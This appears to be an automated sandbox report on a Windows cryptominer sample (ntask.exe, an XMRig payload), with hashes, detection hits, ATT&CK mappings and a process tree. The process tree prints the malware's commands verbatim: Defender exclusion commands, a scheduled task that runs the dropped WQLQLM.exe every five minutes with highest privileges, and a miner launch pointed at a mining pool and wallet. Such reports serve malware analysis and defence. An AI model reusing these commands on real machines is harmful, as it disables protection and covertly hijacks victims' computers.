xmrig | 33ea3291888e65cd2787c30b6fca559f77c6039e8d003d04be5d1d03632de3c8

Analysis

max time kernel
90s
max time network
128s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
02/05/2023, 02:08

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ntask.exe
Size

424.9MB
MD5

01acd528a1667196a0ad033a07434def
SHA1

4d9f342f615390ce65fe0bba3394a75124438a19
SHA256

726df5e4dbc4649d29ead6c0600c20ffd0a1a304207ae0f419a73c3b57fe8249
SHA512

7a5ac4af98ea1e2f27b20babf76e1e9a44e7ea9f247dddfa69f6b3ae159c9ad82c6f5e6791b3023cedbb9842e302de974c61b820e95d56ce7b5147947ce463b4
SSDEEP

49152:YiycrWBo+A5snqekfdvlDrCeTtavT1jwMRkoFGdPZVKxg5zpKqQ3DSM0+Co:Yt3Oc

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 19 IoCs

miner

resource	yara_rule
behavioral3/memory/1076-116-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-117-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-118-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-119-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-120-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-121-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-122-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-123-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-125-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-127-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-129-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-130-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-131-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-132-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-133-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-134-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-135-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-136-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral3/memory/1076-138-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

.NET Reactor proctector 5 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral3/memory/1968-54-0x0000000000240000-0x000000000047A000-memory.dmp	net_reactor
behavioral3/files/0x00090000000122e3-86.dat	net_reactor
behavioral3/files/0x00090000000122e3-88.dat	net_reactor
behavioral3/files/0x00090000000122e3-89.dat	net_reactor
behavioral3/memory/1548-90-0x0000000001060000-0x000000000129A000-memory.dmp	net_reactor

Executes dropped EXE 1 IoCs

pid	Process
1548	WQLQLM.exe

Loads dropped DLL 1 IoCs

pid	Process
548	cmd.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1548 set thread context of 1076	1548	WQLQLM.exe	43

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1880	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
732	timeout.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1116	powershell.exe
468	powershell.exe
1904	powershell.exe
788	powershell.exe
1548	WQLQLM.exe
1548	WQLQLM.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
460	Process not Found

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	1968	ntask.exe
Token: SeDebugPrivilege	1116	powershell.exe
Token: SeDebugPrivilege	468	powershell.exe
Token: SeDebugPrivilege	1548	WQLQLM.exe
Token: SeDebugPrivilege	1904	powershell.exe
Token: SeDebugPrivilege	788	powershell.exe
Token: SeLockMemoryPrivilege	1076	vbc.exe
Token: SeLockMemoryPrivilege	1076	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1076	vbc.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 1968 wrote to memory of 1116	1968	ntask.exe	27
PID 1968 wrote to memory of 1116	1968	ntask.exe	27
PID 1968 wrote to memory of 1116	1968	ntask.exe	27
PID 1968 wrote to memory of 468	1968	ntask.exe	29
PID 1968 wrote to memory of 468	1968	ntask.exe	29
PID 1968 wrote to memory of 468	1968	ntask.exe	29
PID 1968 wrote to memory of 548	1968	ntask.exe	31
PID 1968 wrote to memory of 548	1968	ntask.exe	31
PID 1968 wrote to memory of 548	1968	ntask.exe	31
PID 548 wrote to memory of 732	548	cmd.exe	33
PID 548 wrote to memory of 732	548	cmd.exe	33
PID 548 wrote to memory of 732	548	cmd.exe	33
PID 548 wrote to memory of 1548	548	cmd.exe	34
PID 548 wrote to memory of 1548	548	cmd.exe	34
PID 548 wrote to memory of 1548	548	cmd.exe	34
PID 1548 wrote to memory of 1904	1548	WQLQLM.exe	35
PID 1548 wrote to memory of 1904	1548	WQLQLM.exe	35
PID 1548 wrote to memory of 1904	1548	WQLQLM.exe	35
PID 1548 wrote to memory of 788	1548	WQLQLM.exe	36
PID 1548 wrote to memory of 788	1548	WQLQLM.exe	36
PID 1548 wrote to memory of 788	1548	WQLQLM.exe	36
PID 1548 wrote to memory of 336	1548	WQLQLM.exe	39
PID 1548 wrote to memory of 336	1548	WQLQLM.exe	39
PID 1548 wrote to memory of 336	1548	WQLQLM.exe	39
PID 336 wrote to memory of 1880	336	cmd.exe	41
PID 336 wrote to memory of 1880	336	cmd.exe	41
PID 336 wrote to memory of 1880	336	cmd.exe	41
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43
PID 1548 wrote to memory of 1076	1548	WQLQLM.exe	43

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\ntask.exe
"C:\Users\Admin\AppData\Local\Temp\ntask.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:468
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpA2D5.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:548
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:732
- - C:\ProgramData\English\WQLQLM.exe
    "C:\ProgramData\English\WQLQLM.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:788
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WQLQLM" /tr "C:\ProgramData\English\WQLQLM.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:336
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WQLQLM" /tr "C:\ProgramData\English\WQLQLM.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:1880
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4AAvbZFu6CJe2k13FgFmnDWHasLSbsKpXNumeQrWnZU8gpV9dURkEmJYtTYSohPLrCYA8bBN5PJRWbo1qgLuzpyNApcPYRh --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1076

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\English\WQLQLM.exe

Filesize
648.0MB

MD5
0e7815c5a7bd60c5f7325eab2764b691

SHA1
0df34bf3647ef9f696b38d2908f8e8b4ca590a89

SHA256
569d8ec429cc2b7792416362cb88fc48daf3ecface59b18315ceac1e7c61290a

SHA512
3e44879ca43a55e8d9baf7f6d0f75134db837407949043095f84fec593d2caafecfb69fa9cb6b427b114cbb383e65ada8f2d4bf20618daf4b7b3faece6536a08

Download Submit
C:\ProgramData\English\WQLQLM.exe

Filesize
530.4MB

MD5
f95e2bb52371e718e4bc8ebcdd4d6b2c

SHA1
197749cadc35ddf69eb517e374339e71e499120d

SHA256
9052f460aa68a92d7ae944f7c3d598ec6ecd0ff2942cf4110e1eec064475a9e3

SHA512
da98e720d0abe225074eaeca265bf470e9fef36a0567601f116b553d3f0c6ad8170fe23495cc9c3ee19ee6517bcd28223f25a2cff050191bba9e6a581677ca13

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA2D5.tmp.bat

Filesize
142B

MD5
63e8f46309ead095ac48e51f0c5ca0ca

SHA1
4da25a890e95a0ecd9d6e5123b4bdce4fbc57232

SHA256
d86e1de4254d1d323e7bc8a8d62ff55805f89c8ea393702c2997668d4d4db59e

SHA512
a4a5429ae80430f6889417d20ac26a8f0c7a0dad7ca9a3065fb6034691307708980f625f4cc1267af3d66fac1eb914aa0c0edccc435f4e146ceeb06066ca5a9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA2D5.tmp.bat

Filesize
142B

MD5
63e8f46309ead095ac48e51f0c5ca0ca

SHA1
4da25a890e95a0ecd9d6e5123b4bdce4fbc57232

SHA256
d86e1de4254d1d323e7bc8a8d62ff55805f89c8ea393702c2997668d4d4db59e

SHA512
a4a5429ae80430f6889417d20ac26a8f0c7a0dad7ca9a3065fb6034691307708980f625f4cc1267af3d66fac1eb914aa0c0edccc435f4e146ceeb06066ca5a9d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c8e6b9fb96d04155ccbe10b5f414178d

SHA1
dd0df8dbab1be7d573de84b98567d84efea751c7

SHA256
232a0488632a84a54c99d440a0d2ecd72e691ad979b661fefeb1b6f7994a4e8e

SHA512
c51aef4a824bea6847a0cd82f213ccbe412e235bf0a2728c0c5d992d217f075dcae8c1a47f22b962448cef3f494e14d5c965c68b7b8abbd4110012a17ccd3fad

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
45fc12db51a5cdf87bd9a9d033333115

SHA1
d4ede8ea189f09a83a5f818d49230b99aaded6b7

SHA256
ff0ad65b89d5bd0adbb2a185f936ea5c2525cd3cc2ba819406e020b963f7839f

SHA512
3d956d67b81cd799b0a6e77e0c29dab64749474e8a88adb3fa75fc766d5933978dbe5009c60b1f62183dc55fd0bf829dd3e2949547c6f9ad02571497938f2312

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
45fc12db51a5cdf87bd9a9d033333115

SHA1
d4ede8ea189f09a83a5f818d49230b99aaded6b7

SHA256
ff0ad65b89d5bd0adbb2a185f936ea5c2525cd3cc2ba819406e020b963f7839f

SHA512
3d956d67b81cd799b0a6e77e0c29dab64749474e8a88adb3fa75fc766d5933978dbe5009c60b1f62183dc55fd0bf829dd3e2949547c6f9ad02571497938f2312

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T78OVDXWD8SSQ2BZIA6A.temp

Filesize
7KB

MD5
c8e6b9fb96d04155ccbe10b5f414178d

SHA1
dd0df8dbab1be7d573de84b98567d84efea751c7

SHA256
232a0488632a84a54c99d440a0d2ecd72e691ad979b661fefeb1b6f7994a4e8e

SHA512
c51aef4a824bea6847a0cd82f213ccbe412e235bf0a2728c0c5d992d217f075dcae8c1a47f22b962448cef3f494e14d5c965c68b7b8abbd4110012a17ccd3fad

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TLES6ARAS7TBE4OY9SK0.temp

Filesize
7KB

MD5
45fc12db51a5cdf87bd9a9d033333115

SHA1
d4ede8ea189f09a83a5f818d49230b99aaded6b7

SHA256
ff0ad65b89d5bd0adbb2a185f936ea5c2525cd3cc2ba819406e020b963f7839f

SHA512
3d956d67b81cd799b0a6e77e0c29dab64749474e8a88adb3fa75fc766d5933978dbe5009c60b1f62183dc55fd0bf829dd3e2949547c6f9ad02571497938f2312

Download Submit
\ProgramData\English\WQLQLM.exe

Filesize
535.3MB

MD5
cb5a523b59d07e82e0f259cf49909c65

SHA1
0c3bcc8032ee4b8b29e7d4ad1d35bee2bd925dc5

SHA256
4af3cb9f82444010b81c3c11892ab567a1d8c5424898c29605b29ce882eb9a69

SHA512
b6654006eaa590328cf01a2b386e323142ac8f7cffc894d2505150aaaf122dc209754b7cb068f011803866fe604188e222552bc5412782bf32afd2ea9580c085

Download Submit
memory/468-64-0x000000001B180000-0x000000001B462000-memory.dmp

Filesize
2.9MB

Download
memory/468-71-0x0000000002754000-0x0000000002757000-memory.dmp

Filesize
12KB

Download
memory/468-72-0x000000000275B000-0x0000000002792000-memory.dmp

Filesize
220KB

Download
memory/468-69-0x0000000002750000-0x00000000027D0000-memory.dmp

Filesize
512KB

Download
memory/468-67-0x0000000002750000-0x00000000027D0000-memory.dmp

Filesize
512KB

Download
memory/788-106-0x0000000002484000-0x0000000002487000-memory.dmp

Filesize
12KB

Download
memory/788-109-0x000000000248B000-0x00000000024C2000-memory.dmp

Filesize
220KB

Download
memory/1076-130-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-129-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-139-0x0000000002140000-0x0000000002160000-memory.dmp

Filesize
128KB

Download
memory/1076-138-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-137-0x0000000002140000-0x0000000002160000-memory.dmp

Filesize
128KB

Download
memory/1076-136-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-135-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-134-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-133-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-132-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-131-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-118-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-128-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/1076-113-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-114-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-115-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-119-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-117-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-127-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-116-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-123-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-121-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-122-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-120-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1076-124-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1076-125-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1116-73-0x000000000234B000-0x0000000002382000-memory.dmp

Filesize
220KB

Download
memory/1116-68-0x0000000002340000-0x00000000023C0000-memory.dmp

Filesize
512KB

Download
memory/1116-66-0x0000000002270000-0x0000000002278000-memory.dmp

Filesize
32KB

Download
memory/1116-70-0x0000000002340000-0x00000000023C0000-memory.dmp

Filesize
512KB

Download
memory/1548-91-0x000000001B830000-0x000000001B8B0000-memory.dmp

Filesize
512KB

Download
memory/1548-90-0x0000000001060000-0x000000000129A000-memory.dmp

Filesize
2.2MB

Download
memory/1904-97-0x000000001B190000-0x000000001B472000-memory.dmp

Filesize
2.9MB

Download
memory/1904-99-0x0000000002490000-0x0000000002498000-memory.dmp

Filesize
32KB

Download
memory/1904-105-0x00000000027DB000-0x0000000002812000-memory.dmp

Filesize
220KB

Download
memory/1904-104-0x00000000027D4000-0x00000000027D7000-memory.dmp

Filesize
12KB

Download
memory/1968-65-0x000000001BD60000-0x000000001BDE0000-memory.dmp

Filesize
512KB

Download
memory/1968-75-0x000000001BD60000-0x000000001BDE0000-memory.dmp

Filesize
512KB

Download
memory/1968-54-0x0000000000240000-0x000000000047A000-memory.dmp

Filesize
2.2MB

Download